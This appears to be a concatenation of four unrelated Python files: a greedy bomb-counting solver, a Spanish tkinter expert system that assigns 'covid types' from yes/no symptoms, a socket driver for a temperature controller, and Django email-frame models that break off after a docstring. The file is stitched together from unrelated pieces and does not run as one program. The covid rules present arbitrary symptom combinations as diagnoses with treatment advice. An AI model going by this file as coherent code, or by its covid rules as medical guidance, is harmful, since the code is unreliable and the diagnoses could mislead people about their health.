from bisect import bisect_left, bisect_right
from collections import deque, Counter
from itertools import combinations, permutations
from math import gcd, sin, cos, tan, degrees, radians
import sys


def input():
    # Fast stdin reader for competitive-programming style input.
    return sys.stdin.readline().rstrip()


MOD = 10 ** 9 + 7
INF = float("inf")


def solve(d, a, monsters):
    """Minimum number of bombs needed to kill every monster.

    A bomb dropped greedily at ``x + d`` damages every monster within
    ``[x, x + 2 * d]`` by ``a`` health per bomb, so a sweep from the left
    with a deque of still-active bombs is optimal.

    Args:
        d: bomb radius.
        a: damage per bomb.
        monsters: iterable of (position, health) pairs.

    Returns:
        Total number of bombs required.
    """
    active = 0   # combined hit count of bombs still covering the sweep position
    answer = 0
    # Each entry: (rightmost coordinate the bombs reach, bombs dropped there).
    bombs = deque()
    for x, hp in sorted(monsters):
        needed = -(-hp // a)  # ceil(hp / a): hits required for this monster
        # Expire bombs whose blast no longer reaches x.
        while bombs and bombs[0][0] < x:
            _, count = bombs.popleft()
            active -= count
        if needed > active:
            extra = needed - active
            answer += extra
            bombs.append((x + 2 * d, extra))
            active = needed
    return answer


if __name__ == "__main__":
    n, d, a = map(int, input().split())
    monsters = [tuple(map(int, input().split())) for _ in range(n)]
    print(solve(d, a, monsters))
from tkinter import*
from tkinter import font
from experta import *
# --- Main window -----------------------------------------------------------
raiz = Tk()
raiz.title("Sistema experto- Tipos de covid")
raiz.config(bg="#f4f7fa")
#raiz.resizable(0,0)
# --- Layout frames (3 x 2 grid of the root window) -------------------------
# mi0Frame: "SÍNTOMAS" header, mi3Frame: "DIAGNÓSTICO" header,
# miFrame: symptom inputs, mi2Frame: diagnosis output, mi4Frame: title bar.
mi0Frame = Frame(raiz)#, width="1200", height="700")
mi0Frame.grid(row=1, column=0)
mi0Frame.config(bg="#f4f7fa")
mi3Frame = Frame(raiz)#, width="1200", height="700")
mi3Frame.grid(row=1, column=1)
mi3Frame.config(bg="#f4f7fa")
miFrame = Frame(raiz)#, width="1200", height="700")
miFrame.grid(row=2, column=0)
miFrame.config(bg="#f4f7fa")
mi2Frame = Frame(raiz, highlightbackground="black", highlightthickness=0.5)
mi2Frame.grid(row=2, column=1)
mi2Frame.config(bg="#f4f7fa")
mi4Frame = Frame(raiz, highlightbackground="black", highlightthickness=0.5)
mi4Frame.grid(row=0, column=0)
mi4Frame.config(bg="#f4f7fa")
# Flag read by Covid.not_matched(): set to 1 by the reset callback so the
# "no match" message is suppressed exactly once after a reset.
reinicio = 0
#-----------------------------------------------INPUTS DE LOS SÍNTOMAS------------------------------------------------------------
# One Label + Entry row per symptom; the user types "si"/"no" in each Entry
# and the Covid engine rules read the values back with .get().
# NOTE(review): 'Century Ghotic' is likely a typo for 'Century Gothic' — Tk
# falls back to a default font, so this is cosmetic only.
sin0 = Label(miFrame, text="Dolor de cabeza:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin0.grid(row=0, column=0,padx=10, pady=10,sticky="e")
in_sin0 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin0.grid(row=0, column=1,padx=10, pady=10)
sin1 = Label(miFrame, text="Perdida del olfato:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin1.grid(row=1, column=0,padx=10, pady=10,sticky="e")
in_sin1 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin1.grid(row=1, column=1,padx=10, pady=10)
sin2 = Label(miFrame, text="Dolor muscular:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin2.grid(row=2, column=0,padx=10, pady=10,sticky="e")
in_sin2 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin2.grid(row=2, column=1,padx=10, pady=10)
sin3 = Label(miFrame, text="Tos:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin3.grid(row=3, column=0,padx=10, pady=10,sticky="e")
in_sin3 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin3.grid(row=3, column=1,padx=10, pady=10)
sin4 = Label(miFrame, text="Dolor de garganta:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin4.grid(row=4, column=0,padx=10, pady=10,sticky="e")
in_sin4 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin4.grid(row=4, column=1,padx=10, pady=10)
sin5 = Label(miFrame, text="Dolor en el pecho:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin5.grid(row=5, column=0,padx=10, pady=10,sticky="e")
in_sin5 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin5.grid(row=5, column=1,padx=10, pady=10)
sin6 = Label(miFrame, text="Fiebre:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin6.grid(row=6, column=0,padx=10, pady=10,sticky="e")
in_sin6 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin6.grid(row=6, column=1,padx=10, pady=10)
sin7 = Label(miFrame, text="Ronquera:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin7.grid(row=7, column=0,padx=10, pady=10,sticky="e")
in_sin7 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin7.grid(row=7, column=1,padx=10, pady=10)
sin8 = Label(miFrame, text="Pérdida del apetito:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin8.grid(row=8, column=0,padx=10, pady=10,sticky="e")
in_sin8 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin8.grid(row=8, column=1,padx=10, pady=10)
sin9 = Label(miFrame, text="Diarrea:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin9.grid(row=9, column=0,padx=10, pady=10,sticky="e")
in_sin9 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin9.grid(row=9, column=1,padx=10, pady=10)
sin10 = Label(miFrame, text="Fatiga:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin10.grid(row=10, column=0,padx=10, pady=10,sticky="e")
in_sin10 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin10.grid(row=10, column=1,padx=10, pady=10)
sin11 = Label(miFrame, text="Confusión:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin11.grid(row=11, column=0,padx=10, pady=10,sticky="e")
in_sin11 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin11.grid(row=11, column=1,padx=10, pady=10)
sin12 = Label(miFrame, text="Dificultad para respirar:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin12.grid(row=12, column=0,padx=10, pady=10,sticky="e")
in_sin12 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin12.grid(row=12, column=1,padx=10, pady=10)
#------Cuadros de los resultados--------
# --- Diagnosis output widgets ----------------------------------------------
# tipo_final is an Entry (integer indices like "0"); descripcion_tipo and
# sugerencias are multi-line Text widgets ("line.column" indices like "1.0").
tipo_final_lbl = Label(mi2Frame, text="Tipo de covid diagnosticado:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
tipo_final_lbl.grid(row=2, column=0,padx=10, pady=10,sticky="n")
tipo_final = Entry(mi2Frame, width=35, justify='center', font=('FELIX TITLING', 10, font.BOLD))
tipo_final.grid(row=3, column=0, padx=1, pady=1)
# Empty label used purely as a vertical spacer.
blank = Label(mi2Frame, bg="#F0F8FF")
blank.grid(row=4, column=0,padx=10, pady=10,sticky="n")
descripcion_tipo_lbl = Label(mi2Frame, text="Descripción del tipo de covid diagnosticado:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
descripcion_tipo_lbl.grid(row=5, column=0,padx=10, pady=10,sticky="n")
descripcion_tipo = Text(mi2Frame, width=60, height=10)
descripcion_tipo.grid(row=6, column=0, padx=10, pady=10)
sugerencias_lbl = Label(mi2Frame, text="Sugerencias para tratar la enfermedad:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sugerencias_lbl.grid(row=7, column=0,padx=10, pady=10,sticky="n")
sugerencias = Text(mi2Frame, width=60, height=10)
sugerencias.grid(row=8, column=0, padx=10, pady=10)
#------HEADER--------
head1 = Label(mi0Frame, text="\nSÍNTOMAS", bg="#F0F8FF", font=('Elephant', 15))
head1.grid(row=0, column=0, sticky="n")
head1_0 = Label(mi3Frame, text="DIAGNÓSTICO", bg="#F0F8FF", font=('Elephant', 15))
head1_0.grid(row=0, column=0, sticky="n")
# NOTE(review): `head1` is rebound to a second (spacer) Label here; the first
# header stays visible because grid() was already called on it.
head1 = Label(mi0Frame, bg="#F0F8FF")
head1.grid(row=1, column=0, sticky="n")
head2 = Label(mi0Frame, text=" -Introduce un 'si' o un 'no' dependiendo de los síntomas que presentes",
              bg="#F0F8FF", font=('Century Ghotic', 11))
head2.grid(row=2, column=0, sticky="n" )
head3 = Label(mi4Frame, text="Sistema experto - Tipos de COVID", bg="#F0F8FF", font=('Elephant', 15))
head3.grid(row=0)
# --- Knowledge-base tables, populated by preprocess() ----------------------
# lista_tipos: covid type names; sintomas_tipo: symptom list per type;
# map_sintomas: str(symptom list) -> type name; d_desc_map / d_tratamiento_map:
# type name -> description / treatment text.
lista_tipos = []
sintomas_tipo = []
map_sintomas = {}
d_desc_map = {}
d_tratamiento_map = {}
def preprocess():
    """Load the knowledge base from disk into the module-level tables.

    Reads "tipos.txt" for the covid type names, then loads each type's
    symptom list, description and treatment text from its per-type file.
    """
    global lista_tipos, sintomas_tipo, map_sintomas, d_desc_map, d_tratamiento_map

    def _read(path):
        # Read a whole text file, closing it deterministically.
        with open(path) as f:
            return f.read()

    # NOTE(review): a trailing newline in tipos.txt would yield an empty type
    # name and a FileNotFoundError below — confirm the file has none.
    lista_tipos = _read("tipos.txt").split("\n")
    for tipo in lista_tipos:
        s_list = _read("Sintomas tipo/" + tipo + ".txt").split("\n")
        sintomas_tipo.append(s_list)
        # The stringified symptom list is the lookup key used by
        # identificar_tipo().
        map_sintomas[str(s_list)] = tipo
        d_desc_map[tipo] = _read("Descripcion tipo/" + tipo + ".txt")
        d_tratamiento_map[tipo] = _read("Tratamientos tipo/" + tipo + ".txt")
def identificar_tipo(*arguments):
    """Return the covid type whose symptom list equals *arguments*.

    The lookup key is str() of the symptom list, mirroring how
    preprocess() populated map_sintomas.
    """
    # TODO: handle KeyError for symptom combinations with no known type.
    lista_sintomas = list(arguments)
    return map_sintomas[str(lista_sintomas)]
def get_details(tipo):
    """Return the stored description text for covid type *tipo*."""
    descripcion = d_desc_map[tipo]
    return descripcion
def get_tratamiento(tipo):
    """Return the stored treatment text for covid type *tipo*."""
    tratamiento = d_tratamiento_map[tipo]
    return tratamiento
def no_coincide(tipo):
    """Show diagnosis *tipo* and its texts in the output widgets.

    Bug fix: tipo_final is an Entry widget, whose indices are plain
    integers ("0"), not Text-style "line.column" indices — passing "1.0"
    raises a TclError.  The rest of the file uses "0" correctly (see
    Covid.tipo()).  The two Text widgets keep their "1.0" indices.
    """
    tipo_final.delete("0", END)
    descripcion_tipo.delete("1.0", END)
    sugerencias.delete("1.0", END)
    id_tipo = tipo
    tipo_details = get_details(id_tipo)
    tratamientos = get_tratamiento(id_tipo)
    tipo_final.insert("0", id_tipo)
    descripcion_tipo.insert("1.0", tipo_details)
    sugerencias.insert("1.0", tratamientos)
#def identificar_tipo(dolor_cabeza, perdida_olfato, dolor_muscular, tos, dolor_garganta, dolor_pecho, fiebre, ronquera, perdida_apetito , diarrea, fatiga, confusión, dificultad_respiratoria):
class Covid(KnowledgeEngine):
    """Experta rule engine mapping the 13 GUI symptom answers to a covid type.

    Flow: the salience=1 rules snapshot each Entry widget into a Fact; the
    tipo_N rules match exact si/no combinations and declare Fact(tipo=...);
    tipo() (salience -998) displays the diagnosis; not_matched()
    (salience -999) reports when no combination rule fired.
    """
    @DefFacts()
    def _initial_action(self):
        # Seed fact required by every rule below.
        yield Fact(action="encontrar_tipo")

    # --- Symptom-gathering rules: each fires once (NOT(...) guard) and
    # copies the corresponding Entry value ('si'/'no') into a Fact. ---------
    @Rule(Fact(action='encontrar_tipo'), NOT(Fact(dolor_cabeza=W())),salience = 1)
    def sintoma_0(self):
        self.declare(Fact(dolor_cabeza=in_sin0.get()))
    @Rule(Fact(action='encontrar_tipo'), NOT(Fact(perdida_olfato=W())),salience = 1)
    def sintoma_1(self):
        self.declare(Fact(perdida_olfato=in_sin1.get()))
    @Rule(Fact(action='encontrar_tipo'), NOT(Fact(dolor_muscular=W())),salience = 1)
    def sintoma_2(self):
        self.declare(Fact(dolor_muscular=in_sin2.get()))
    @Rule(Fact(action='encontrar_tipo'), NOT(Fact(tos=W())),salience = 1)
    def sintoma_3(self):
        self.declare(Fact(tos=in_sin3.get()))
    @Rule(Fact(action='encontrar_tipo'), NOT(Fact(dolor_garganta=W())),salience = 1)
    def sintoma_4(self):
        self.declare(Fact(dolor_garganta=in_sin4.get()))
    @Rule(Fact(action='encontrar_tipo'), NOT(Fact(dolor_pecho=W())),salience = 1)
    def sintoma_5(self):
        self.declare(Fact(dolor_pecho=in_sin5.get()))
    @Rule(Fact(action='encontrar_tipo'), NOT(Fact(fiebre=W())),salience = 1)
    def sintoma_6(self):
        self.declare(Fact(fiebre=in_sin6.get()))
    @Rule(Fact(action='encontrar_tipo'), NOT(Fact(ronquera=W())),salience = 1)
    def sintoma_7(self):
        self.declare(Fact(ronquera=in_sin7.get()))
    @Rule(Fact(action='encontrar_tipo'), NOT(Fact(perdida_apetito=W())),salience = 1)
    def sintoma_8(self):
        self.declare(Fact(perdida_apetito=in_sin8.get()))
    @Rule(Fact(action='encontrar_tipo'), NOT(Fact(diarrea=W())),salience = 1)
    def sintoma_9(self):
        self.declare(Fact(diarrea=in_sin9.get()))
    @Rule(Fact(action='encontrar_tipo'), NOT(Fact(fatiga=W())),salience = 1)
    def sintoma_10(self):
        self.declare(Fact(fatiga=in_sin10.get()))
    @Rule(Fact(action='encontrar_tipo'), NOT(Fact(confusion=W())),salience = 1)
    def sintoma_11(self):
        self.declare(Fact(confusion=in_sin11.get()))
    @Rule(Fact(action='encontrar_tipo'), NOT(Fact(dificultad_respiratoria=W())),salience = 1)
    def sintoma_12(self):
        self.declare(Fact(dificultad_respiratoria=in_sin12.get()))

    # --- Diagnosis rules: one exact si/no combination per covid type. ------
    @Rule(Fact(action='encontrar_tipo'),Fact(dolor_cabeza="si"),Fact(perdida_olfato="si"),Fact(dolor_muscular="si"),Fact(tos="si"),Fact(dolor_garganta="si"),Fact(dolor_pecho="si"),Fact(fiebre="no"),Fact(ronquera="no"),Fact(perdida_apetito="no"),Fact(diarrea="no"),Fact(fatiga="no"),Fact(confusion="no"),Fact(dificultad_respiratoria="no"))
    def tipo_0(self):
        self.declare(Fact(tipo="Gripal sin fiebre"))
    @Rule(Fact(action='encontrar_tipo'),Fact(dolor_cabeza="si"),Fact(perdida_olfato="si"),Fact(dolor_muscular="no"),Fact(tos="si"),Fact(dolor_garganta="si"),Fact(dolor_pecho="no"),Fact(fiebre="si"),Fact(ronquera="si"),Fact(perdida_apetito="si"),Fact(diarrea="no"),Fact(fatiga="no"),Fact(confusion="no"),Fact(dificultad_respiratoria="no"))
    def tipo_1(self):
        self.declare(Fact(tipo="Gripal con fiebre"))
    @Rule(Fact(action='encontrar_tipo'),Fact(dolor_cabeza="si"),Fact(perdida_olfato="si"),Fact(dolor_muscular="no"),Fact(tos="no"),Fact(dolor_garganta="si"),Fact(dolor_pecho="si"),Fact(fiebre="no"),Fact(ronquera="no"),Fact(perdida_apetito="no"),Fact(diarrea="si"),Fact(fatiga="no"),Fact(confusion="no"),Fact(dificultad_respiratoria="no"))
    def tipo_2(self):
        self.declare(Fact(tipo="Gastro Intestinal"))
    @Rule(Fact(action='encontrar_tipo'),Fact(dolor_cabeza="si"),Fact(perdida_olfato="si"),Fact(dolor_muscular="no"),Fact(tos="si"),Fact(dolor_garganta="no"),Fact(dolor_pecho="si"),Fact(fiebre="si"),Fact(ronquera="si"),Fact(perdida_apetito="no"),Fact(diarrea="no"),Fact(fatiga="si"),Fact(confusion="no"),Fact(dificultad_respiratoria="no"))
    def tipo_3(self):
        self.declare(Fact(tipo="Nivel severo uno"))
    @Rule(Fact(action='encontrar_tipo'),Fact(dolor_cabeza="si"),Fact(perdida_olfato="si"),Fact(dolor_muscular="si"),Fact(tos="si"),Fact(dolor_garganta="si"),Fact(dolor_pecho="si"),Fact(fiebre="si"),Fact(ronquera="si"),Fact(perdida_apetito="si"),Fact(diarrea="no"),Fact(fatiga="si"),Fact(confusion="si"),Fact(dificultad_respiratoria="no"))
    def tipo_4(self):
        self.declare(Fact(tipo="Nivel severo dos"))
    @Rule(Fact(action='encontrar_tipo'),Fact(dolor_cabeza="si"),Fact(perdida_olfato="si"),Fact(dolor_muscular="si"),Fact(tos="si"),Fact(dolor_garganta="si"),Fact(dolor_pecho="si"),Fact(fiebre="si"),Fact(ronquera="si"),Fact(perdida_apetito="si"),Fact(diarrea="si"),Fact(fatiga="si"),Fact(confusion="si"),Fact(dificultad_respiratoria="si"))
    def tipo_5(self):
        self.declare(Fact(tipo="Nivel severo tres"))
    @Rule(Fact(action='encontrar_tipo'),Fact(dolor_cabeza="no"),Fact(perdida_olfato="no"),Fact(dolor_muscular="no"),Fact(tos="no"),Fact(dolor_garganta="no"),Fact(dolor_pecho="no"),Fact(fiebre="no"),Fact(ronquera="no"),Fact(perdida_apetito="no"),Fact(diarrea="no"),Fact(fatiga="no"),Fact(confusion="no"),Fact(dificultad_respiratoria="no"))
    def tipo_6(self):
        self.declare(Fact(tipo="No es covid"))

    # --- Output rules -------------------------------------------------------
    @Rule(Fact(action='encontrar_tipo'),Fact(tipo=MATCH.tipo),salience = -998)
    def tipo(self, tipo):
        # tipo_final is an Entry (integer index "0"); the other two are Text
        # widgets ("line.column" index "1.0").
        tipo_final.delete("0", END)
        descripcion_tipo.delete("1.0", END)
        sugerencias.delete("1.0", END)
        id_tipo = tipo
        tipo_details = get_details(id_tipo)
        tratamientos = get_tratamiento(id_tipo)
        tipo_final.insert("0", id_tipo)
        descripcion_tipo.insert("1.0", tipo_details)
        sugerencias.insert("1.0",tratamientos)
    @Rule(Fact(action='encontrar_tipo'),
          Fact(dolor_cabeza=MATCH.dolor_cabeza),
          Fact(perdida_olfato=MATCH.perdida_olfato),
          Fact(dolor_muscular=MATCH.dolor_muscular),
          Fact(tos=MATCH.tos),
          Fact(dolor_garganta=MATCH.dolor_garganta),
          Fact(dolor_pecho=MATCH.dolor_pecho),
          Fact(fiebre=MATCH.fiebre),
          Fact(ronquera=MATCH.ronquera),
          Fact(perdida_apetito=MATCH.perdida_apetito),
          Fact(diarrea=MATCH.diarrea),
          Fact(fatiga=MATCH.fatiga),
          Fact(confusion=MATCH.confusion),
          Fact(dificultad_respiratoria=MATCH.dificultad_respiratoria),NOT(Fact(tipo=MATCH.tipo)),salience = -999)
    def not_matched(self,dolor_cabeza, perdida_olfato, dolor_muscular, tos, dolor_garganta, dolor_pecho, fiebre, ronquera,perdida_apetito ,diarrea ,fatiga ,confusion ,dificultad_respiratoria):
        # Fires only when no tipo_N rule matched.  The `reinicio` flag set by
        # the reset callback suppresses the message for that one engine run.
        global reinicio
        if reinicio == 0:
            tipo_final.delete("0", END)
            descripcion_tipo.delete("1.0", END)
            sugerencias.delete("1.0", END)
            tipo_final.insert("0", "Sin coincidencia")
            descripcion_tipo.insert("1.0", "No se encontró un tipo de covid que se relacione con los síntomas presentados")
            sugerencias.insert("1.0", "Se sugiere consultar a un médico que le ayude a descubrir su tipo de enfermedad")
        else:
            reinicio = 0
def iniciar_sistema():
    """Callback for the RESULTADO button: (re)load the knowledge base and
    run the inference engine over the current symptom inputs.

    Bug fix: the body was wrapped in ``if __name__ == "__main__":`` which
    silently turns the button into a no-op whenever this module is imported
    instead of executed directly.
    """
    preprocess()
    engine = Covid()
    engine.reset()
    engine.run()
def reiniciar():
    """Callback for the REINICIAR button: clear every input/output widget
    and re-run the engine from a clean state."""
    global reinicio
    # Tell Covid.not_matched() to stay silent for this (empty-input) run.
    reinicio = 1
    # Clear the 13 symptom entries plus the result Entry (integer indices).
    for entry in (in_sin0, in_sin1, in_sin2, in_sin3, in_sin4, in_sin5,
                  in_sin6, in_sin7, in_sin8, in_sin9, in_sin10, in_sin11,
                  in_sin12, tipo_final):
        entry.delete("0", END)
    descripcion_tipo.delete('1.0', END)
    sugerencias.delete('1.0', END)
    # NOTE(review): preprocess() re-appends to sintomas_tipo on every reset,
    # so that list grows with duplicates — consider clearing the tables first.
    preprocess()
    engine = Covid()
    engine.reset()
    engine.run()
def salir():
    """Callback for the SALIR button: terminate the application."""
    raise SystemExit
#------------------BOTONES---------------------------------------
# RESULTADO: run the expert system on the current inputs.
generarTabla = Button(
    miFrame,
    text="RESULTADO",
    command=iniciar_sistema,
    bg="#7fd1ff",
    font=("Eurostile", 10, font.BOLD),
    padx=20,
    pady=5
)
generarTabla.grid(row=13, column=1, padx=10, pady=15)
# NOTE(review): this assignment rebinds `reiniciar` from the callback
# function to the Button; it works only because command= captured the
# function first.  Consider renaming the Button variable.
reiniciar = Button(
    mi2Frame, text="REINICIAR",
    command=reiniciar,
    bg="#7fd1ff",
    font=("Eurostile", 10, font.BOLD),
    padx=20,
    pady=5
)
reiniciar.grid(row=9, column=0, padx=10, pady=15)
# NOTE(review): same shadowing issue — `salir` becomes the Button here.
salir = Button(
    mi2Frame, text="SALIR",
    command=salir,
    bg="#ea9999",
    font=("Eurostile", 9),
    border='2p',
    padx=20,
    pady=3
)
salir.grid(row=10, column=0, padx=10, pady=15)
# Start the Tk event loop (blocks until the window is closed).
raiz.mainloop()
import socket
import time
import shelve
# Controller write commands keyed by preset channel number.  Each entry is
# [select-command, setpoint-command-prefix]:
#   'MB00xx,1' makes the channel the active preset (see change_channel());
#   'MI06xx,'  is the setpoint prefix — preset() appends a 4-character
#              temperature field in tenths of a degree.
preset_command = {
    1: ['MB0023,1', 'MI0695,'],
    2: ['MB0024,1', 'MI0696,'],
    # NOTE(review): 'MB0076' breaks the MB0023..MB0026 pattern of the other
    # channels — confirm against the device register map.
    3: ['MB0076,1', 'MI0697,'],
    4: ['MB0026,1', 'MI0698,'],
}
force_command = 'MB0336,1'  # force output on (sent by task_generate())
start_command = 'MB0020,0'  # start the device
stop_command = 'MB0020,1'   # stop the device
class Temperature:
    """TCP driver for a 4-channel temperature controller.

    Connection settings and per-channel setpoints/enable flags are loaded
    from the 'init/init_temp' shelve file.  Log lines are not printed
    directly: send_info() stores them so the owning thread can poll
    `is_info` / `info`.
    """

    def __init__(self):
        # True whenever a fresh log line is waiting in self.info.
        self.is_info = False
        # Latest log line for the main thread.
        self.info = ''
        # List of (setpoint, channel-number) tasks, filled by task_generate().
        self.task = []
        # Load the configuration; the context manager closes the shelf even
        # if a key is missing.
        with shelve.open('init/init_temp') as init_temp:
            self.ip = init_temp['temp_ip']
            self.channel1_temp = init_temp['temp_channel1_temp']
            self.channel2_temp = init_temp['temp_channel2_temp']
            self.channel3_temp = init_temp['temp_channel3_temp']
            self.channel4_temp = init_temp['temp_channel4_temp']
            self.is_channel1_temp = init_temp['temp_is_channel1_temp']
            self.is_channel2_temp = init_temp['temp_is_channel2_temp']
            self.is_channel3_temp = init_temp['temp_is_channel3_temp']
            self.is_channel4_temp = init_temp['temp_is_channel4_temp']
        self.channel1 = (self.channel1_temp, 1)
        self.channel2 = (self.channel2_temp, 2)
        self.channel3 = (self.channel3_temp, 3)
        self.channel4 = (self.channel4_temp, 4)
        # Connect to the controller (fixed port 5000).
        self.server = socket.socket()
        # self.ip = '192.168.0.14'
        self.port = 5000
        try:
            self.server.connect((self.ip, self.port))
            self.send_info('[INFO-TEMP]connect successfully')
            time.sleep(1)
        except OSError:
            # Narrowed from a bare `except:`: socket failures are OSError.
            self.send_info('[FAIL-TEMP]connect fail')

    def send(self, data):
        """Send *data* (ASCII text) to the device."""
        try:
            self.server.send(bytes(data, encoding='ASCII'))
        except ConnectionError:
            self.send_info('[FAIL-TEMP]send data fail')

    def recv(self):
        """Receive one reply from the device; ',9990' sentinel on failure."""
        try:
            text = str(self.server.recv(1024), encoding='UTF-8')
        except ConnectionError:
            self.send_info('[FAIL-TEMP]receive error')
            text = ',9990'
        return text

    def command(self, command):
        """Send a raw command, preceded by the 'm' attention byte."""
        self.send('m')
        time.sleep(1)
        self.send(command)
        time.sleep(1)

    def write_command(self, command):
        """Send a write command (no return value) and wait for the OK ack."""
        self.command(command)
        self.ack()

    def query_command(self, command):
        """Send a query command and return the device's reply."""
        self.command(command)
        return self.recv()

    def ack(self):
        """Block until the device answers 'OK'."""
        while True:
            if self.recv() == 'OK':
                break

    @staticmethod
    def _format_temp(temp):
        """Format integer *temp* as the device's 4-character setpoint field.

        The field is the temperature in tenths of a degree, i.e. str(temp)
        zero-padded and suffixed with '0' (25 -> '0250').  Values are
        clamped to the device range [-75, 175].

        Bug fix: the clamp branches used to sit *after* the magnitude
        branches of the elif chain, making them unreachable (200 was sent
        as '2000' instead of '1750').  They are checked first now.
        """
        if temp >= 175:
            return '1750'
        if temp <= -75:
            return '-750'
        if temp == 0:
            return '0000'
        if 0 < temp < 10:
            return '00' + str(temp) + '0'
        if 9 < temp < 100:
            return '0' + str(temp) + '0'
        if temp > 99:
            return str(temp) + '0'
        if -10 < temp < 0:
            # NOTE(review): yields e.g. '0-50' for -5 (behavior kept from
            # the original) — confirm the device does not expect '-050'.
            return '0' + str(temp) + '0'
        # Remaining case: -75 < temp < -9.
        return str(temp) + '0'

    def preset(self, channel):
        """Program one preset channel; *channel* is a (setpoint, number) pair."""
        temp = int(channel[0])
        temp_command = self._format_temp(temp)
        channel_command = preset_command[channel[1]][1]
        command = channel_command + temp_command
        self.write_command(command)
        self.send_info('[INFO-TEMP]channel' + str(channel[1]) + ', ' + str(channel[0]) +'℃ set successfully!')

    def change_channel(self, channel):
        """Make *channel*'s preset the active setpoint."""
        state_command = preset_command[channel[1]][0]
        self.write_command(state_command)
        self.send_info('[INFO-TEMP]change channel ' + str(channel[1]) + " " + str(channel[0]) + '℃')

    def task_generate(self):
        """Program every enabled channel, queue it in self.task, force output on."""
        if self.is_channel1_temp:
            self.preset((self.channel1_temp, 1))
            self.task.append(self.channel1)
        if self.is_channel2_temp:
            self.preset((self.channel2_temp, 2))
            self.task.append(self.channel2)
        if self.is_channel3_temp:
            self.preset((self.channel3_temp, 3))
            self.task.append(self.channel3)
        if self.is_channel4_temp:
            self.preset((self.channel4_temp, 4))
            self.task.append(self.channel4)
        self.write_command(force_command)
        self.send_info('[INFO-TEMP]force on')

    def check_temp(self, channel):
        """Poll the device until it reports the target temperature three
        times in a row (reply format 'MI6,<tenths-of-a-degree>')."""
        while True:
            for i in range(3):
                text = self.query_command('MI0006?')
                temp1 = int(text.split(',')[1])  # reading, tenths of a degree
                self.send_info('[INFO-TEMP]temp: ' + str(temp1 / 10.0) + '℃')
                temp = int(channel[0])
                if (temp1 == temp * 10) and (i == 2):
                    # Third consecutive match: temperature is stable.
                    return
                elif temp1 == temp * 10:
                    pass
                else:
                    # Mismatch: restart the three-match streak.
                    break

    def start(self):
        """Start the device."""
        self.write_command(start_command)
        self.send_info('[INFO-TEMP]running!')

    def stop(self):
        """Stop the device."""
        self.write_command(stop_command)
        self.send_info('[INFO-TEMP]close!')

    def run(self, task):
        """Switch to *task*'s channel and wait until its temperature is reached."""
        self.change_channel(task)
        self.check_temp(task)
        time.sleep(1)

    def send_info(self, info):
        """Publish a log line for the main thread to pick up."""
        self.info = info
        self.is_info = True
if __name__ == '__main__':
    # Manual smoke test: connect to the controller using the shelved config.
    temperature = Temperature()
from django.conf import settings
from django.core.mail import send_mail
from django.db import models
from django.db.models import ForeignKey, OneToOneField, TextField, CharField, \
SET_NULL, CASCADE, BooleanField, UniqueConstraint
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.template import Template, Context
from django.utils import timezone
from markdown import markdown
from html2text import html2text
from chair_mail.context import get_conference_context, get_user_context, \
get_submission_context, get_frame_context
from conferences.models import Conference
from submissions.models import Submission
from users.models import User
# Discriminators for the two GroupMessage flavours (see UserMessage and
# SubmissionMessage below).
MSG_TYPE_USER = 'user'
MSG_TYPE_SUBMISSION = 'submission'
# Django `choices` for CharFields holding a message type.
MESSAGE_TYPE_CHOICES = (
    (MSG_TYPE_USER, 'Message to users'),
    (MSG_TYPE_SUBMISSION, 'Message to submissions'),
)
class EmailFrame(models.Model):
    """Outer layout ("frame") into which the subject and body of every
    outgoing conference email are rendered.

    `text_html` / `text_plain` are Django templates receiving the frame
    context (conference data plus subject and body).
    """
    text_html = models.TextField()
    text_plain = models.TextField()
    created_at = models.DateTimeField(auto_now_add=True)
    # Bug fix: was auto_now_add=True, which freezes the timestamp at row
    # creation; auto_now=True refreshes it on every save().
    updated_at = models.DateTimeField(auto_now=True)
    created_by = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)
    conference = models.ForeignKey(Conference, on_delete=models.CASCADE)

    @staticmethod
    def render(frame_template, conference, subject, body):
        """Render *frame_template* against the frame context.

        Autoescaping is disabled because the templates produce ready-made
        HTML / plain text, not user-supplied form input.
        """
        context_data = get_frame_context(conference, subject, body)
        context = Context(context_data, autoescape=False)
        return Template(frame_template).render(context)

    def render_html(self, subject, body):
        """Render the HTML variant of this frame."""
        return EmailFrame.render(
            self.text_html, self.conference, subject, body
        )

    def render_plain(self, subject, body):
        """Render the plain-text variant, deriving it from the HTML frame
        when no explicit plain-text template was stored."""
